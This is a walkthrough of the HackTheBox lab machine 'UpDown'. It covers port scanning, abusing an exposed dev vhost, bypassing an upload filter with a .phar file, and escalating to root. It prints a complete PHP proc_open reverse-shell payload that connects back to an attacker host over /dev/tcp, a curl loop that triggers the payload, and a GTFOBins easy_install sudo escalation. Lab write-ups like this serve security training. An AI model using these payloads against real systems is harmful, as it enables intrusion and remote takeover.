Up Down
IP: 10.129.111.50
THM{THREAT_BLOCKED}
Enumeration
nmap -vv --min-rate=1000 -T4 10.129.111.50 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
nmap -vv -p22,80 -T4 -sCV -oN nmap.txt 10.129.111.50
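The same two-stage scan, as an added example that is not part of the original writeup: the port list is taken from nmap's greppable (-oG) output and filtered on state, so closed or filtered ports that -vv prints in the port table are not fed into the -sCV scan. The -oG text inside sample_gnmap is constructed to look like nmap's format for this host; it is not a captured scan.

```shell
#!/bin/sh
# Added example, not from the original writeup. The -oG output below is a
# constructed sample in nmap's greppable format, not a real scan result.
sample_gnmap() {
    printf '# Nmap 7.93 scan initiated (constructed sample)\n'
    printf 'Host: 10.129.111.50 ()\tStatus: Up\n'
    printf 'Host: 10.129.111.50 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (65532)\n'
    printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
}

# Read -oG output on stdin; print the open TCP ports as "22,80" with no
# trailing comma, ready for nmap -p. Closed/filtered entries are dropped.
open_ports() {
    grep '^Host:.*Ports:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | tr -d ' ' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }' \
    | sort -n -u \
    | paste -sd, -
}

ports=$(sample_gnmap | open_ports)
echo "$ports"   # 22,80

# Live use (not run here):
#   nmap -vv --min-rate=1000 -T4 -oG - 10.129.111.50 | open_ports
#   nmap -vv -p "$ports" -T4 -sCV -oN nmap.txt 10.129.111.50
```

Filtering on the state field is the point: with -vv and only a handful of ports found, nmap's human-readable table also lists closed and filtered ports, and a bare grep on leading digits would pass those to the second scan.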
First find the exposed git repo on the webapp and the dev vhost. A directory scan turns up /dev:
┌──(loc㉿kali)-[~/HackTheBox/UpDown]
└─$ dirsearch -u http://siteisup.htb/
#########################
[06:26:02] 301 - 310B - /dev -> http://siteisup.htb/dev/
########################
In the git repo's source, check checker.php: you can upload a file, and .phar is not in the upload filter's extension list.
The .htaccess also shows that dev.siteisup.htb only answers requests carrying this header (in Burp, add a match/replace rule so every request gets it):
Special-Dev: only4dev
With that you can run PHP on the dev vhost, but disable_functions blocks the functions normally used to run system commands.
Use file_put_contents to write <?php phpinfo(); ?> into a .php file on the webapp and read the disable_functions entry to see exactly which ones are blocked.
proc_open is not one of them, so append the following PHP after the list of URLs in the file you upload, set your listener's IP and port, and upload it as a .phar:
<?php
// Placeholders: replace <ATTACKER-IP> and <PORT> with your listener.
// Any connect-back command works here; this one needs bash for /dev/tcp.
$cmd = "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'";

$descriptorspec = array(
    0 => array("pipe", "r"),                          // stdin: a pipe the child reads from
    1 => array("pipe", "w"),                          // stdout: a pipe the child writes to
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr: appended to a file
);

// proc_open is not in disable_functions, so it can still spawn the shell.
$process = proc_open($cmd, $descriptorspec, $pipes);
if (is_resource($process)) {
    // The child never reads stdin; close it so nothing waits on it.
    fclose($pipes[0]);
    // Drain stdout until the child exits. The shell's I/O goes to the socket,
    // so nothing useful comes back here; this only keeps the request alive.
    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // Close every pipe before proc_close, otherwise it can deadlock.
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
Foothold
Then trigger it with a GET request to the uploaded .phar. Uploads land in subfolders of /uploads/, so list the folders and request the phar in each (all on one line):
curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/${line}<PHAR-FILE-NAME>.phar"; done < folder-names
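The directory-harvesting half of that one-liner, as an added example that is not part of the original writeup, written as functions that can be checked offline. The autoindex HTML inside sample_index is constructed to mimic Apache's listing of /uploads and the folder names in it are made up; shell.phar is a hypothetical upload name. The host, path and Special-Dev header are the ones used on this page.

```shell
#!/bin/sh
# Added example, not from the original writeup. The listing below is a
# constructed Apache autoindex page; directory names are invented.
sample_index() {
    cat <<'EOF'
<html><head><title>Index of /uploads</title></head><body>
<h1>Index of /uploads</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="0a1b2c3d4e5f/">0a1b2c3d4e5f/</a></td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="deadbeef0001/">deadbeef0001/</a></td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="notes.txt">notes.txt</a></td></tr>
</table></body></html>
EOF
}

# Read an autoindex page on stdin; print the href of every [DIR] row, one per
# line. Matching the href attribute instead of a fixed cut field keeps this
# working if the listing's column layout differs. Files and the parent link
# ([PARENTDIR] does not contain "[DIR]") are skipped.
upload_dirs() {
    grep '\[DIR\]' | sed 's/.*<a href="\([^"]*\)".*/\1/'
}

# Turn the directory list into the URLs to request. $1 is the uploaded .phar
# name (hypothetical); host and path are the ones from this page.
phar_urls() {
    upload_dirs | sed "s|^|http://dev.siteisup.htb/uploads/|; s|\$|$1|"
}

sample_index | phar_urls shell.phar

# Live use (not run here): fetch the real listing with the Special-Dev header
# and request each URL. Give curl --max-time or background it, because the
# request blocks for as long as the spawned shell stays alive.
#   curl -s -H 'Special-Dev: only4dev' http://dev.siteisup.htb/uploads/ \
#     | phar_urls shell.phar \
#     | while read -r u; do curl -s --max-time 5 -H 'Special-Dev: only4dev' "$u"; done
```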
USER
Running strings on the binary, or just executing it, shows that it simply runs a Python script with SUID privileges.
We can inject commands and get the user's SSH key by inputting something like:
After logging in with the SSH key you got, check sudo; you will see this:
You can get root by running these commands from easy_install | GTFOBins:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF
Endgame 04/09/2022